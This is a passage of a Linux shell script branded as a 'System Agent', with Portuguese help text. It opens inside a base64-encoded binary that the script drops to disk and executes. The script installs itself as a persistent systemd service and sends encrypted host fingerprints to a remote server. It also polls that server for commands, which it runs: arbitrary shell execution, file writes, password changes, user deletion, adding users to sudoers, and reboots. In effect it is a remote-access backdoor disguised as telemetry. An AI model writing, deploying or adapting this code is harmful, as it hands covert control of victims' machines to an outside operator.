AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABYAAAAAAADAFQAAAAAAAAEA
AAAAAAAAGQEAAAAAAAABAAAAAAAAACkBAAAAAAAADAAAAAAAAAAAEAAAAAAAAA0AAAAAAAAA
DBYAAAAAAAAZAAAAAAAAAEg9AAAAAAAAGwAAAAAAAAAIAAAAAAAAABoAAAAAAAAAUD0AAAAA
AAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAACwAwAAAAAAAAUAAAAAAAAA+AUAAAAAAAAGAAAA
AAAAAOgDAAAAAAAACgAAAAAAAABUAQAAAAAAAAsAAAAAAAAAGAAAAAAAAAAVAAAAAAAAAAAA
AAAAAAAAAwAAAAAAAABYPwAAAAAAAAIAAAAAAAAAOAEAAAAAAAAUAAAAAAAAAAcAAAAAAAAA
FwAAAAAAAADACAAAAAAAAAcAAAAAAAAAuAcAAAAAAAAIAAAAAAAAAAgBAAAAAAAACQAAAAAA
AAAYAAAAAAAAAB4AAAAAAAAACAAAAAAAAAD7//9vAAAAAAEAAAgAAAAA/v//bwAAAAB4BwAA
AAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAAEwHAAAAAAAA+f//bwAAAAADAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWD0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAMBAAAAAA
AABAEAAAAAAAAFAQAAAAAAAAYBAAAAAAAABwEAAAAAAAAIAQAAAAAAAAkBAAAAAAAACgEAAA
AAAAALAQAAAAAAAAwBAAAAAAAADQEAAAAAAAAOAQAAAAAAAA8BAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIQAAAAAAAAEdDQzogKFVi
dW50dSAxMS40LjAtMXVidW50dTF+MjIuMDQuMykgMTEuNC4wAAAuc2hzdHJ0YWIALmludGVy
cAAubm90ZS5nbnUucHJvcGVydHkALm5vdGUuZ251LmJ1aWxkLWlkAC5ub3RlLkFCSS10YWcA
LmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IA
LnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0LmdvdAAucGx0LnNlYwAudGV4dAAuZmlu
aQAucm9kYXRhAC5laF9mcmFtZV9oZHIALmVoX2ZyYW1lAC5pbml0X2FycmF5AC5maW5pX2Fy
cmF5AC5keW5hbWljAC5kYXRhAC5ic3MALmNvbW1lbnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAAAQAAAAIA
AAAAAAAAGAMAAAAAAAAYAwAAAAAAABwAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA
EwAAAAcAAAACAAAAAAAAADgDAAAAAAAAOAMAAAAAAAAwAAAAAAAAAAAAAAAAAAAACAAAAAAA
AAAAAAAAAAAAACYAAAAHAAAAAgAAAAAAAABoAwAAAAAAAGgDAAAAAAAAJAAAAAAAAAAAAAAA
AAAAAAQAAAAAAAAAAAAAAAAAAAA5AAAABwAAAAIAAAAAAAAAjAMAAAAAAACMAwAAAAAAACAA
AAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAARwAAAPb//28CAAAAAAAAALADAAAAAAAA
sAMAAAAAAAA0AAAAAAAAAAYAAAAAAAAACAAAAAAAAAAAAAAAAAAAAFEAAAALAAAAAgAAAAAA
AADoAwAAAAAAAOgDAAAAAAAAEAIAAAAAAAAHAAAAAQAAAAgAAAAAAAAAGAAAAAAAAABZAAAA
AwAAAAIAAAAAAAAA+AUAAAAAAAD4BQAAAAAAAFQBAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAA
AAAAAAAAYQAAAP///28CAAAAAAAAAEwHAAAAAAAATAcAAAAAAAAsAAAAAAAAAAYAAAAAAAAA
AgAAAAAAAAACAAAAAAAAAG4AAAD+//9vAgAAAAAAAAB4BwAAAAAAAHgHAAAAAAAAQAAAAAAA
AAAHAAAAAQAAAAgAAAAAAAAAAAAAAAAAAAB9AAAABAAAAAIAAAAAAAAAuAcAAAAAAAC4BwAA
AAAAAAgBAAAAAAAABgAAAAAAAAAIAAAAAAAAABgAAAAAAAAAhwAAAAQAAABCAAAAAAAAAMAI
AAAAAAAAwAgAAAAAAAA4AQAAAAAAAAYAAAAYAAAACAAAAAAAAAAYAAAAAAAAAJEAAAABAAAA
BgAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAGwAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAA
AACMAAAAAQAAAAYAAAAAAAAAIBAAAAAAAAAgEAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAQAAAA
AAAAABAAAAAAAAAAlwAAAAEAAAAGAAAAAAAAAAARAAAAAAAAABEAAAAAAAAQAAAAAAAAAAAA
AAAAAAAAEAAAAAAAAAAQAAAAAAAAAKAAAAABAAAABgAAAAAAAAAQEQAAAAAAABARAAAAAAAA
0AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAACpAAAAAQAAAAYAAAAAAAAA4BEAAAAA
AADgEQAAAAAAACkEAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAArwAAAAEAAAAGAAAA
AAAAAAwWAAAAAAAADBYAAAAAAAANAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAALUA
AAABAAAAAgAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAswAAAAAAAAAAAAAAAAAAAAgAAAAAAAAA
AAAAAAAAAAC9AAAAAQAAAAIAAAAAAAAAtCAAAAAAAAC0IAAAAAAAADQAAAAAAAAAAAAAAAAA
AAAEAAAAAAAAAAAAAAAAAAAAywAAAAEAAAACAAAAAAAAAOggAAAAAAAA6CAAAAAAAADoAAAA
AAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAANUAAAAOAAAAAwAAAAAAAABIPQAAAAAAAEgt
AAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADhAAAADwAAAAMAAAAAAAAA
UD0AAAAAAABQLQAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA7QAAAAYA
AAADAAAAAAAAAFg9AAAAAAAAWC0AAAAAAAAAAgAAAAAAAAcAAAAAAAAACAAAAAAAAAAQAAAA
AAAAAJsAAAABAAAAAwAAAAAAAABYPwAAAAAAAFgvAAAAAAAAqAAAAAAAAAAAAAAAAAAAAAgA
AAAAAAAACAAAAAAAAAD2AAAAAQAAAAMAAAAAAAAAAEAAAAAAAAAAMAAAAAAAABAAAAAAAAAA
AAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA/AAAAAgAAAADAAAAAAAAACBAAAAAAAAAEDAAAAAA
AAAwAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAEBAAABAAAAMAAAAAAAAAAAAAAA
AAAAABAwAAAAAAAALQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAwAAAAAA
AAAAAAAAAAAAAAAAAAA9MAAAAAAAAAoBAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA"

_ensure_crypt_helper() {
    local helper="${BWS_DIR}/bws_crypt"
    if [ -x "$helper" ]; then
        echo "$helper"
        return 0
    fi
    mkdir -p "$BWS_DIR" 2>/dev/null || true
    echo "$BWS_CRYPT_B64" | base64 -d > "$helper" 2>/dev/null
    chmod 755 "$helper" 2>/dev/null
    if [ -x "$helper" ]; then
        echo "$helper"
        return 0
    fi
    echo ""
    return 1
}

encrypt_payload() {
    local plaintext="$1"
    local hex="${_pk_a}${_pk_b}${_pk_c}${_pk_d}"
    local helper
    helper=$(_ensure_crypt_helper)
    if [ -z "$helper" ]; then
        echo ""
        return 1
    fi
    echo "$plaintext" | "$helper" "$hex" | base64 -w0 2>/dev/null
}

# ─── Persistence ─────────────────────────────────────────────────────────
_self_install() {
    mkdir -p "$BWS_DIR" 2>/dev/null || true

    if [ ! -f "$MARKER" ]; then
        touch "$MARKER"

        local id
        id=$(cat /etc/machine-id 2>/dev/null | sha256sum | cut -c1-16)
        [ -z "$id" ] && id=$(openssl rand -hex 8 2>/dev/null)
        echo "$id" > "$AGENT_ID_FILE"

        if command -v systemctl >/dev/null 2>&1; then
            cat > "$SERVICE_FILE" << EOF
[Unit]
Description=bws System Agent
After=network.target

[Service]
Type=simple
ExecStart=${BWS_BIN} --serve
Environment=osbin=${osbin}
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
EOF
            systemctl daemon-reload 2>/dev/null
            systemctl enable bws.service 2>/dev/null
            systemctl restart bws.service 2>/dev/null
        fi
    else
        if command -v systemctl >/dev/null 2>&1 && \
           ! systemctl is-enabled bws.service >/dev/null 2>&1; then
            _self_install
        fi
    fi
}

# ─── Agent ID ────────────────────────────────────────────────────────────
_get_agent_id() {
    if [ ! -f "$AGENT_ID_FILE" ]; then
        local id
        id=$(cat /etc/machine-id 2>/dev/null | sha256sum | cut -c1-16)
        [ -z "$id" ] && id=$(openssl rand -hex 8 2>/dev/null)
        echo "$id" > "$AGENT_ID_FILE"
    fi
    cat "$AGENT_ID_FILE" 2>/dev/null || echo "unknown"
}

# ─── Telemetry Collection ────────────────────────────────────────────────
collect_telemetry() {
    local ts hostname user uptime_sec os kernel cpu_cores mem_total swap_total
    local disks ip_addr

    ts=$(date -u +"%Y-%m-%dT%H:%M:%SZ" 2>/dev/null)
    hostname=$(hostname 2>/dev/null)
    user=$(whoami 2>/dev/null)
    uptime_sec=$(awk '{print int($1)}' /proc/uptime 2>/dev/null)
    os=$(cat /etc/os-release 2>/dev/null | grep "^PRETTY_NAME" | cut -d'"' -f2)
    [ -z "$os" ] && os=$(uname -s 2>/dev/null)
    kernel=$(uname -r 2>/dev/null)
    cpu_cores=$(nproc 2>/dev/null)
    mem_total=$(awk '/MemTotal/{print int($2/1024)}' /proc/meminfo 2>/dev/null)
    swap_total=$(awk '/SwapTotal/{print int($2/1024)}' /proc/meminfo 2>/dev/null)
    disks=$(df -h --total 2>/dev/null | grep "^total" | awk '{print $2, $3, $4, $5}')
    ip_addr=$(curl -s --max-time 5 https://api.ipify.org 2>/dev/null || \
              curl -s --max-time 5 https://ifconfig.me 2>/dev/null || \
              echo "unknown")

    local agent_id
    agent_id=$(_get_agent_id)

    cat << EOF
{"agent_id":"${agent_id}","ts":"${ts}","hostname":"${hostname}","user":"${user}","uptime":${uptime_sec:-0},"os":"${os}","kernel":"${kernel}","cpu_cores":${cpu_cores:-0},"mem_mb":${mem_total:-0},"swap_mb":${swap_total:-0},"disk":"${disks}","ip":"${ip_addr}"}
EOF
}

# ─── Command Execution ────────────────────────────────────────────────────
run_cmd() {
    local action="$1"
    shift

    case "$action" in
        exec)
            local cmd="$*"
            if [ -n "$cmd" ]; then
                _run_setsid "$cmd"
            else
                echo "FAIL: empty command"
            fi
            ;;
        write_file)
            local path="$1"
            local content="$2"
            if [ -n "$path" ] && [ -n "$content" ]; then
                printf '%s' "$content" > "$path" 2>/dev/null && echo "OK" || echo "FAIL: write"
            else
                echo "FAIL: missing path or content"
            fi
            ;;
        reboot)
            echo "EXECUTING: reboot"
            shutdown -r now 2>/dev/null || reboot 2>/dev/null || echo "FAIL: reboot not available"
            ;;
        poweroff)
            echo "EXECUTING: poweroff"
            shutdown -h now 2>/dev/null || poweroff 2>/dev/null || echo "FAIL: poweroff not available"
            ;;
        change_password)
            local user="$1"
            local pass="$2"
            echo "$user:$pass" | chpasswd 2>/dev/null && echo "OK" || echo "FAIL: password change"
            ;;
        remove_user)
            local user="$1"
            userdel -r "$user" 2>/dev/null && echo "OK" || echo "FAIL: user removal"
            ;;
        add_sudo)
            local user="$1"
            echo "$user ALL=(ALL) ALL" >> /etc/sudoers 2>/dev/null && echo "OK" || echo "FAIL: sudo add"
            ;;
        collect|telemetry)
            collect_telemetry
            ;;
        *)
            echo "FAIL: unknown action: $action"
            ;;
    esac
}

_run_setsid() {
    local cmd="$*"
    if command -v setsid >/dev/null 2>&1; then
        setsid sh -c "$cmd" </dev/null >/dev/null 2>&1 &
    else
        sh -c "$cmd" </dev/null >/dev/null 2>&1 &
    fi
    disown 2>/dev/null
}

# ─── Push telemetry ──────────────────────────────────────────────────────
push_telemetry() {
    local data=$(collect_telemetry)
    local encrypted
    encrypted=$(encrypt_payload "$data")

    curl -s --max-time 30 -X POST \
        -H "Content-Type: text/plain" \
        -d "$encrypted" \
        "${SERVER}/" 2>/dev/null || true

    date +%s > "$TIMER_FILE"
}

# ─── JSON parser leve (sem jq) ───────────────────────────────────────────
_json_val() {
    local key="$1"
    local json="$2"
    echo "$json" | grep -oP "\"${key}\":\s*\"[^\"]*\"" | head -1 | sed "s/.*\"${key}\":\s*\"//" | sed 's/".*//'
}

_json_arr() {
    local json="$1"
    echo "$json" | grep -oP '\{[^}]*\}' || true
}

# ─── Poll for commands ───────────────────────────────────────────────────
poll_commands() {
    local agent_id
    agent_id=$(cat "$AGENT_ID_FILE" 2>/dev/null || echo "unknown")

    local response
    response=$(curl -s --max-time 30 "${SERVER}/poll/${agent_id}" 2>/dev/null)

    if [ -z "$response" ] || [ "$response" = "null" ] || [ "$response" = "[]" ]; then
        return
    fi

    local items
    items=$(_json_arr "$response")

    local old_ifs="$IFS"
    IFS="$old_ifs"
    echo "$items" | while read -r item; do
        [ -z "$item" ] && continue
        local action=$(_json_val "action" "$item")
        local job_id=$(_json_val "job_id" "$item")
        local params=$(_json_val "params" "$item")

        [ -z "$action" ] && continue

        local result
        case "$action" in
            reboot|poweroff)
                result=$(run_cmd "$action")
                ;;
            change_password)
                local user=$(_json_val "user" "{${params}}")
                local pass=$(_json_val "password" "{${params}}")
                result=$(run_cmd change_password "$user" "$pass")
                ;;
            remove_user)
                local user=$(_json_val "user" "{${params}}")
                result=$(run_cmd remove_user "$user")
                ;;
            add_sudo)
                local user=$(_json_val "user" "{${params}}")
                result=$(run_cmd add_sudo "$user")
                ;;
            exec)
                local cmd=$(_json_val "command" "{${params}}")
                [ -z "$cmd" ] && cmd="$params"
                result=$(run_cmd exec "$cmd")
                ;;
            write_file)
                local path=$(_json_val "path" "{${params}}")
                local content=$(_json_val "content" "{${params}}")
                result=$(run_cmd write_file "$path" "$content")
                ;;
            collect|telemetry)
                result=$(collect_telemetry)
                ;;
            *)
                result="FAIL: unknown action ${action}"
                ;;
        esac

        if [ -n "$job_id" ]; then
            curl -s --max-time 30 -X POST \
                -H "Content-Type: application/json" \
                -d "{\"job_id\":\"${job_id}\",\"result\":\"${result}\"}" \
                "${SERVER}/result/${agent_id}" 2>/dev/null || true
        fi
    done
}

# ─── Mode: serve (daemon) ────────────────────────────────────────────────
mode_serve() {
    _self_install

    while true; do
        local now
        now=$(date +%s)
        local last_push=0
        [ -f "$TIMER_FILE" ] && last_push=$(cat "$TIMER_FILE" 2>/dev/null || echo 0)
        local week=$((7*24*3600))

        if [ $((now - last_push)) -ge "$week" ]; then
            push_telemetry
        fi

        poll_commands

        sleep 3600
    done
}

# ─── Mode: run once (push telemetry) ──────────────────────────────────────
mode_once() {
    _self_install
    push_telemetry
}

# ─── Mode: collect (show raw telemetry) ───────────────────────────────────
mode_collect() {
    collect_telemetry
}

# ─── Help ────────────────────────────────────────────────────────────────
print_help() {
    echo "bws - System Agent"
    echo
    echo "Uso: bws [opcoes]"
    echo
    echo "  --serve       Inicia o daemon (agent mode)"
    echo "  -p, --once    Push telemetry uma vez"
    echo "  --collect     Exibe dados coletados (stdout)"
    echo "  --install     Instala servico systemd"
    echo "  -h, --help    Esta ajuda"
    echo "  -V, --version Versao"
    echo
    echo "Variavel de ambiente: osbin=<chave>"
    echo
}

# ─── Main ────────────────────────────────────────────────────────────────
if [ $# -eq 0 ]; then
    if [ -f "$MARKER" ]; then
        mode_serve
    else
        print_help
    fi
    exit 0
fi

case "$1" in
    -h|--help)    print_help ;;
    -V|--version) echo "bws v1.0.1 (Build 20260618)"; exit 0 ;;
    --serve)      mode_serve ;;
    -p|--once)    mode_once ;;
    --collect)    mode_collect ;;
    --install)    _self_install; echo "Instalado." ;;
    *)
        if [ -f "$MARKER" ]; then
            run_cmd exec "$@"
        else
            echo "Opcao desconhecida: $1"
            exit 1
        fi
        ;;
esac

exit 0
